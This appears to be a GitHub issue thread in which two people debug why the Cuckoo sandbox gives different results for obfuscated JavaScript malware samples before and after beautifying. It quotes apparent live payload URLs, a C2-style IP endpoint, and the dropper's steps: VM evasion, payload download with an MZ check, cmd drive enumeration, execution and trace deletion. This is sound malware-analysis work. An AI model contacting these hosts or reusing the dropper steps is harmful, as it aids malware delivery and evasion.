jsbeautifier with obfuscated code

[Nwinternights]

Hi, I submitted this js md5(106398258b338bb9a0cbadebb99a7a8) with obfuscated code. the analysis ends with no special warnings (no http get for payload) because seems that jsbeautifier makes some mess or the JS contains invalid characters that wscript cannot parse . So after manually deobfuscated the js md5(5abc907b092c6c28f5455777b3304d66) i resubmitted to cuckoo and the analysis gives me more warnings even the payload and URL regards before: https://www.reverse.it/sample/77f8919ca00d0aae72f8c0ba41f406ec9f21b47d07e0f460585beab53e72f9e1?environmentId=100 after: https://www.reverse.it/sample/0b78fbc00e5ca1f9113d90edc4e1a05577168bc2d561e0c111914daa8bcae6b6?environmentId=100

[doomedraven]

but are you sure what is jsbeautifier problem? if they had some badchars or whatever, it won't execte correctly anyway no if there no dropper which will remove it? or i miss something?

[Nwinternights]

Well I dunno. The code is obfuscated and it seems that Windows cannot execute it but if you try to submit both samples, on the first if you look at the strings it seems jsbeautifier didn't work and on signature it comes like chinese chars (Utf-16): COleScript_Compile | type: JScript - script block script: 汪䭔䱓睆睭坶汨‽㈢㌵ ㅣ.... .. the second sample i get this COleScript_Compile | type: JScript - script block script: jlTKSLFwmwvWhln .... ... and it raises alerts.

[Nwinternights]

I didn't deobfuscate the js I just beutify it Using a 10 seconds timeout, pass --timeout to specify another timeout in seconds [info] Rewriting code... [info] Preprocessing with uglify-js v3.0.24 (remove --preprocess to skip)... [info] Replacing function A.prototype.B() (use --no-rewrite-prototype to skip)... [info] Rewriting typeof calls (use --no-typeof-rewrite to skip)... [info] Rewriting eval calls (use --no-eval-rewrite to skip)... [info] Rewriting try/catch statements (use --no-catch-rewrite to skip)... [info] Rewritten successfully. [info] GET http://www.renenekuda.cz/images/r7.php?fOrWJdAUXn=tKkBTKXcGgrK&group=ITrar [info] Returning HTTP 404 (Not found); use --download to try to download the payload

[Nwinternights]

@doomedraven any clues? do you think it's a no issue so I can close it?

[doomedraven]

so you mean without jsbeautiful it works and within it doesnt? explain a bit better, bcz your first post confusing

[Nwinternights]

:-) yeah I agree with you it was a bit confusing. I try to be more clear: 1- One JS sample ---> cuckoo ---> no signatures . 2- Same JS sample --> jsbeautifier.org --> cuckoo -->> Signature matched first Js sample: 8106398258b338bb9a0cbadebb99a7a8 sample but with js beautifier d726c700097ed1471491158552eda5e3 seems like the COleScript_Compiles using Utf-16 instead of Utf-8...but I dunno if its the main cause.

[doomedraven]

hm the case is interesting, i was looking a bit on it, google dev console can interpret it just fine, so we need to figurate what is wrong here, i saw a lot of people pointing what it should be in ansi, tried and the same result

[Nwinternights]

I got another interesting case. ( I 'll try to be clear) :-) :-) js.zip The same file is with and without obfuscation. If you look at the code you 'll see that the files does a lot of stuffs such as: VmCheck / Evasion Post to https://185.159.82.54:7500/SS/lafamilia.php?add=stayoutofmyterritory&u= verify that the host replied with HTTP 200 save the payload to disk fly.jse check the first two bytes of the payload to verify that it starts with the MZ magic number call cmd /U /Q /C cd /D : && dir /b/s/x >>%TEMP%\ for each drive call cmd \c start (which runs the dropped file) call cmd /U /Q /C del /Q/F %TEMP%\.exe && del /Q/F %TEMP%\.gop && del /Q/F %TEMP%\*.txt && del /Q/F %TEMP%\.log && del /Q/F %TEMP%\.jse open 0. And some other "intersting" stuffs

But if u submit both file You just have a signature that matches execution of Javascript. If you look at cuckoo js.py package u'll see that also all files executed by wscript are treated as Js. As a consequence if you have a jse, on behivour analysis you'll have = file.jse.js . regards